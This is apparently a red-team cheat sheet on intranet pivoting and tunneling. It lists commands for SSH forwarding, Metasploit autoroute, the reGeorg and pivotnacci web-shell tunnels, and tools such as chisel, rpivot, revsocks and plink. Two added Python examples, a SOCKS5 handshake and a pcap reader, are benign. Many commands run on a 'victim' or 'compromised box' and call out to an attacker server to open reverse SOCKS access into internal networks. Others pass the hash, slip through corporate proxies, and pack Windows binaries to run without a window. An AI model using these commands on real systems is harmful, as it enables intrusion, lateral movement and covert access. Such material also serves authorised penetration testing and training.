Summary of Intranet Tunneling Techniques

This article summarizes approaches and methods for intranet tunneling (pivoting) and port forwarding.

0x00 Basic Techniques

1. Types

Type               Use case
Listen - Listen    Both ends are exposed as listeners; the relay itself never has to connect out
Listen - Connect   Regular forwarding
Connect - Connect  The relay cannot bind a port of its own; it connects out to both hosts and bridges them

2. Listen - Listen

Tool            Usage
ncat            ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socat           socat -v tcp-listen:8080 tcp-listen:9090
remote host 1   ncat localhost 8080 < file
remote host 2   ncat localhost 9090 > newfile

Note: the 9090 listener only appears after a connection on 8080 has been accepted (ncat runs the -c command on accept; socat opens its second address after the first), so host 1 must connect before host 2.

3. Listen - Connect

Tool            Usage
ncat            ncat -l -v -p 8080 -c "ncat localhost 9090"
socat           socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1   ncat localhost 8080 < file
remote host 2   ncat -l -p 9090 > newfile

Note: the relay dials 9090 as soon as it accepts on 8080, so host 2 must already be listening when host 1 connects. (In ncat connect mode the destination port is a positional argument; -p sets the source port, so "ncat localhost -p 8080" would not do what is wanted here.)

4. Connect - Connect

Tool            Usage
ncat            ncat localhost 8080 -c "ncat localhost 9090"
socat           socat -v tcp-connect:localhost:8080 tcp-connect:localhost:9090
remote host 1   ncat -l -p 8080 < file
remote host 2   ncat -l -p 9090 > newfile

Note: both hosts must be listening before the relay starts. This is the shape to use when the relay host can make outbound connections but is not allowed to open a port of its own.

0x01 SSH端口转发

1. SOCKS Proxy

ssh -D 8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]

-f : ssh in background
-N : do not execute a remote command
-D : open a SOCKS4/5 listener on the local port; connections made through it leave from [host]

The -D listener binds to localhost by default; use -D [bindaddr]:[port] (e.g. 0.0.0.0:9000) if other machines should be able to use the proxy.

2. Local Port Forwarding

# [bindaddr]:[port] on this machine is forwarded through [host] to [dsthost]:[dstport]
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

3. Remote Port Forwarding

# [bindaddr]:[port] on [host] is forwarded back through the SSH session to [localhost]:[localport]
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
# port 3389 on [host] reaches 10.1.1.224:3389 on this side's network (RDP)
ssh -R 3389:10.1.1.224:3389 [user]@[host]

The remote listener binds to loopback on [host] unless sshd there has GatewayPorts enabled; without it, only processes on [host] itself can use the forwarded port.
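What the SOCKS listener opened by `ssh -D` (and, later on this page, by chisel `R:socks`, revsocks, gost and the Metasploit socks_proxy module) actually speaks, as an added example in Python that is not code from OpenSSH or any tool listed here. Both halves of the RFC 1928 CONNECT handshake are implemented: `socks5_connect()` can be pointed at a real endpoint such as 127.0.0.1:9000 from `ssh -D 9000 [user]@[host]` to confirm the pivot reaches an internal host before proxychains or a scanner is aimed at it, and `demo_handshake()` runs both halves over a socketpair so it needs no network. The target names and ports are constructed.

```python
"""SOCKS5 (RFC 1928) CONNECT handshake, both halves, no authentication.
Added example for this page; socks5_connect() works against any SOCKS5 endpoint,
demo_handshake() runs client and server over a socketpair. Targets are constructed."""
import socket
import struct
import threading

VER, NO_AUTH, NO_ACCEPTABLE = 0x05, 0x00, 0xFF
CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x01, 0x03, 0x04
REP_TEXT = {0x00: "succeeded", 0x01: "general failure", 0x02: "not allowed by ruleset",
            0x03: "network unreachable", 0x04: "host unreachable", 0x05: "connection refused",
            0x06: "TTL expired", 0x07: "command not supported", 0x08: "address type not supported"}


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf


def build_greeting():
    """VER NMETHODS METHODS: offer only 'no authentication'."""
    return bytes([VER, 1, NO_AUTH])


def build_connect_request(host, port):
    """VER CMD RSV ATYP DST.ADDR DST.PORT; dotted quad -> ATYP 1, anything else -> ATYP 3 (domain)."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def build_reply(rep, bnd_addr="0.0.0.0", bnd_port=0):
    """VER REP RSV ATYP BND.ADDR BND.PORT with an IPv4 bind address."""
    return bytes([VER, rep, 0x00, ATYP_IPV4]) + socket.inet_aton(bnd_addr) + struct.pack("!H", bnd_port)


def _read_addr(sock, atyp):
    if atyp == ATYP_IPV4:
        return socket.inet_ntoa(_recv_exact(sock, 4))
    if atyp == ATYP_DOMAIN:
        return _recv_exact(sock, _recv_exact(sock, 1)[0]).decode("idna")
    if atyp == ATYP_IPV6:
        return socket.inet_ntop(socket.AF_INET6, _recv_exact(sock, 16))
    raise ConnectionError("address type %d not supported" % atyp)


def socks5_connect(sock, host, port):
    """Client half; sock is already connected to the proxy. Returns the proxy's (BND.ADDR, BND.PORT)
    once the tunnel is up, or raises ConnectionError carrying the RFC reason text."""
    sock.sendall(build_greeting())
    ver, method = _recv_exact(sock, 2)
    if ver != VER or method != NO_AUTH:
        raise ConnectionError("proxy refused anonymous access (method %#x)" % method)
    sock.sendall(build_connect_request(host, port))
    ver, rep, _rsv, atyp = _recv_exact(sock, 4)
    bnd_addr = _read_addr(sock, atyp)
    bnd_port = struct.unpack("!H", _recv_exact(sock, 2))[0]
    if rep != 0x00:
        raise ConnectionError("CONNECT %s:%d failed: %s" % (host, port, REP_TEXT.get(rep, hex(rep))))
    return bnd_addr, bnd_port


def socks5_accept(sock):
    """Server half. Returns the (host, port) the client asked for; the caller then dials it and
    answers with build_reply(). Other commands and address types are refused per the RFC."""
    ver, nmethods = _recv_exact(sock, 2)
    methods = _recv_exact(sock, nmethods)
    if ver != VER or NO_AUTH not in methods:
        sock.sendall(bytes([VER, NO_ACCEPTABLE]))
        raise ConnectionError("client offered no acceptable auth method")
    sock.sendall(bytes([VER, NO_AUTH]))
    ver, cmd, _rsv, atyp = _recv_exact(sock, 4)
    try:
        host = _read_addr(sock, atyp)
    except ConnectionError:
        sock.sendall(build_reply(0x08))
        raise
    port = struct.unpack("!H", _recv_exact(sock, 2))[0]
    if cmd != CMD_CONNECT:
        sock.sendall(build_reply(0x07))
        raise ConnectionError("command %d not supported" % cmd)
    return host, port


def demo_handshake(target="10.1.1.224", port=3389, rep=0x00):
    """Both halves over a socketpair: the server half records the request and answers with rep.
    Returns (requested (host, port), client result or error text)."""
    client, server = socket.socketpair()
    seen = {}

    def serve():
        try:
            seen["request"] = socks5_accept(server)
            server.sendall(build_reply(rep, "127.0.0.1", 40000))
        except ConnectionError as exc:
            seen["error"] = str(exc)
        finally:
            server.close()

    t = threading.Thread(target=serve)
    t.start()
    try:
        result = socks5_connect(client, target, port)
    except ConnectionError as exc:
        result = str(exc)
    client.close()
    t.join()
    return seen.get("request"), result
```

The domain address type (ATYP 3) is what lets DNS resolution happen on the far side of the pivot; a client that resolves names locally and sends ATYP 1 will fail for internal hostnames that only the pivot can resolve, which is why tools such as proxychains expose a "proxy_dns" option.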

0x02 Metasploit Pivoting

# Meterpreter: list active port forwards
portfwd list

# Listen on local port 3389 and forward it through the session to 3389 on target-host (RDP)
portfwd add -l 3389 -p 3389 -r target-host
portfwd add -l 88 -p 88 -r 127.0.0.1
# -L sets the local bind address; 0.0.0.0 makes the forward reachable from other hosts, not just this box
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Delete the 3389 forward added above
portfwd delete -l 3389 -p 3389 -r target-host
# Meterpreter: delete all port forwards
portfwd flush

or

# Meterpreter: use autoroute to route the specified subnet 192.168.15.0/24 through this session
run autoroute -s 192.168.15.0/24
# (post-module form of the same: run post/multi/manage/autoroute SUBNET=192.168.15.0 NETMASK=255.255.255.0)
# then, in msfconsole, expose the routed networks as a SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
run
# or
use auxiliary/server/socks4a # (deprecated)


# Meterpreter: list all active routes
run autoroute -p

# Meterpreter: view the networks the compromised host can reach (its own routing table)
route
# msfconsole: add a route for 192.168.14.0/24 via session number 3
route add 192.168.14.0 255.255.255.0 3

# msfconsole: delete the route for 192.168.14.0/24 via session 3
route delete 192.168.14.0 255.255.255.0 3

# msfconsole: delete all routes
route flush

0x03 Graftcp

Basic usage

# Create a SOCKS5 proxy with chisel (or another tool) on the VPS and bring it back over SSH
(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 --reverse
(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks

# Run graftcp-local pointed at that SOCKS5, then launch the tool through graftcp
# (graftcp hooks the child's connect() calls with ptrace, so tools with no proxy support still pivot)
(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
(attacker) $ graftcp ./nuclei -u http://172.16.1.24

Basic configuration

# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf
## Listen address (default ":2233")
listen = :2233
loglevel = 1

## SOCKS5 address (default "127.0.0.1:1080")
socks5 = 127.0.0.1:1080
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD

## Set the mode for selecting a proxy (default "auto")
select_proxy_mode = auto

0x04 Web SOCKS

1. reGeorg

# the tunnel script (tunnel.jsp/aspx/php etc., shipped with reGeorg) must already be uploaded to the web server
python reGeorgSocksProxy.py -p 8080 -u http://host/shell.jsp  # the SOCKS proxy will listen on port 8080

optional arguments:
  -h, --help          show this help message and exit
  -l, --listen-on     the default listening address
  -p, --listen-port   the default listening port
  -r, --read-buff     local read buffer, max data to be sent per POST
  -u, --url           the URL of the tunnel script
  -v, --verbose       verbose output [INFO|DEBUG]

2. pivotnacci

pip3 install pivotnacci
# agent.php is one of the agents shipped with pivotnacci, uploaded to the target web server beforehand
pivotnacci https://domain.com/agent.php --password "s14r1t"
pivotnacci https://domain.com/agent.php --polling-interval 2000

0x05 Empire

(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10   # the host running socksproxyserver
(Empire) > run

0x06 sshuttle

pacman -Sy sshuttle
apt-get install sshuttle
# route 10.1.1.0/24 through the SSH host; sshuttle needs root locally for the firewall rules and only python on the pivot
sshuttle -vvr [user]@[host] 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24

# using a private key
$ sshuttle -vvr [user]@[host] 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"

# -x == exclude a network so it is not sent over the tunnel
# -x x.x.x.x/24

0x07 chisel

go install github.com/jpillora/chisel@latest   # 'go get' no longer installs binaries on Go >= 1.18

# forward port 389 and 88 to hacker computer
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389

# SOCKS: R:socks opens a SOCKS5 listener on the server side (127.0.0.1:1080 by default)
user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks

0x08 Ligolo

Build Ligolo

# Get Ligolo and dependencies
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep

# Generate self-signed TLS certificates (will be placed in the certs folder)
make certs TLS_HOST=example.com

make build-all

Use Ligolo

# On your attack server.
./bin/localrelay_linux_amd64

# On the compromised host.
ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

0x09 Gost

git clone https://github.com/ginuerzh/gost
cd gost/cmd/gost
go build

# SOCKS5 proxy
# server side:
gost -L=socks5://:1080
# client side: local port 8080 is served through the remote SOCKS5
gost -L=:8080 -F=socks5://server_ip:1080?notls=true

# Local port forward
gost -L=tcp://:2222/192.168.1.1:22 [-F=..]

0x0A Rpivot

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

0x0B revsocks

# Listen on the server and create a SOCKS5 proxy on port 1080
user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234

# Connect client to the server
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234
# ... through an authenticating corporate proxy, with a browser-like User-Agent
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/username:userpass -useragent "Mozilla 5.0/IE Windows 10"
# Build for Linux
git clone https://github.com/kost/revsocks
cd revsocks
export GOPATH=~/go
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
go build
# stripped and packed build
go build -ldflags="-s -w" && upx --brute revsocks

# Build for Windows
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
# without a console window
GOOS=windows GOARCH=amd64 go build -ldflags -H=windowsgui
upx revsocks.exe
0x0C plink

# on the first connection plink asks whether to cache the host key; prefix with `echo y |` from a non-interactive shell
# expose the machine's SMB port (445) as port 445 on the SSH server
plink -l root -pw toor ssh-server-ip -R 445:127.0.0.1:445
# expose the machine's RDP port (3389) as port 3390 on the SSH server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389

plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
plink.exe -v -pw mypassword [user]@[host] -L 6666:127.0.0.1:445

# expose the Windows machine's port 445 on Kali (192.168.12.185) as port 445, over SSH on port 22; -C enables compression
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185

0x0D ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

0x0E cloudflared

# Get the binary
wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz
tar xvzf cloudflared-stable-linux-amd64.tgz
# Expose an accessible internal service to the internet
./cloudflared tunnel --url <protocol>://<host>:<port>

0x0F Traffic Capture and Analysis

1. Windows (netsh)

# start a capture with the built-in netsh command (requires an elevated prompt)
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384

# stop the trace
netsh trace stop

# event tracing can also persist across reboots
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384

# To open the file in Wireshark, convert the .etl to pcapng with Microsoft's etl2pcapng converter (download the latest release).
etl2pcapng.exe c:\trace.etl c:\trace.pcapng

# Use filters
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384

2. Linux (tcpdump)

sudo apt-get install tcpdump
tcpdump -w 0001.pcap -i eth0   # write raw packets to a file for Wireshark or offline analysis
tcpdump -A -i eth0             # print packet payloads as ASCII

# capture every TCP packet
tcpdump -i eth0 tcp

# capture everything on port 22
tcpdump -i eth0 port 22

# when capturing on a host you reached over SSH, add "and not port 22" so your own session stays out of the capture
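What the file written by `tcpdump -w` looks like and how the `port 22` filter applies to it offline, as an added example in Python (not tcpdump's or Wireshark's code): a minimal libpcap reader with an Ethernet/IPv4/TCP decoder, run over a capture constructed inline (the addresses 10.200.200.3 and 10.1.1.224 are reused from this page; ports, MACs and timestamps are made up). pcapng, the format etl2pcapng produces, has a different block structure and is not handled here.

```python
"""Minimal libpcap (.pcap) reader: replay `port 22` over a file written by `tcpdump -w`.
Added example for this page; the capture is constructed inline, only Ethernet/IPv4/TCP is
decoded, and pcapng (what etl2pcapng writes) is out of scope."""
import io
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4   # microsecond-resolution pcap, written in the capturing host's byte order
LINKTYPE_ETHERNET = 1


def write_pcap(packets):
    """Serialize (ts_sec, ts_usec, frame) tuples into a little-endian pcap image:
    24-byte global header, then a 16-byte record header in front of every frame."""
    out = io.BytesIO()
    out.write(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for sec, usec, frame in packets:
        out.write(struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame)
    return out.getvalue()


def read_pcap(data):
    """Yield (timestamp, frame) records; the magic number reveals which byte order the writer used."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a libpcap file (pcapng needs a different reader)")
    linktype = struct.unpack(endian + "IHHiIII", data[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only LINKTYPE_ETHERNET captures are decoded here")
    off = 24
    while off + 16 <= len(data):
        sec, usec, incl, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield sec + usec / 1e6, data[off:off + incl]
        off += incl


def decode_tcp(frame):
    """(src_ip, src_port, dst_ip, dst_port) for an Ethernet/IPv4/TCP frame, None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4                          # IPv4 header length, options included
    if frame[23] != 6:                                    # IP protocol 6 = TCP
        return None
    ip, tcp = frame[14:14 + ihl], frame[14 + ihl:14 + ihl + 4]
    if len(tcp) < 4:
        return None
    sport, dport = struct.unpack("!HH", tcp)
    return socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport


def filter_port(pcap_bytes, port):
    """Same semantics as `tcpdump -r file port N`: TCP packets with N as source OR destination port."""
    return [tcp for _, frame in read_pcap(pcap_bytes)
            if (tcp := decode_tcp(frame)) and port in (tcp[1], tcp[3])]


def make_frame(src_ip, sport, dst_ip, dport):
    """Constructed Ethernet/IPv4/TCP SYN with zero MACs, no payload and unset checksums."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x02, 65535, 0, 0)
    return eth + ip + tcp


# Constructed sample capture: one SSH exchange and one RDP SYN between hosts named on this page.
SAMPLE_PCAP = write_pcap([
    (1700000000, 0, make_frame("10.200.200.3", 51000, "10.1.1.224", 22)),
    (1700000000, 1000, make_frame("10.1.1.224", 22, "10.200.200.3", 51000)),
    (1700000001, 0, make_frame("10.200.200.3", 51001, "10.1.1.224", 3389)),
])

if __name__ == "__main__":
    for hit in filter_port(SAMPLE_PCAP, 22):
        print("%s:%d -> %s:%d" % hit)
```

The byte-order check on the magic number matters in practice: a capture taken on the pivot with `tcpdump -w` is written in that host's endianness, and a reader that assumes little-endian will misparse record lengths from a big-endian capture and silently walk off into the packet data.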
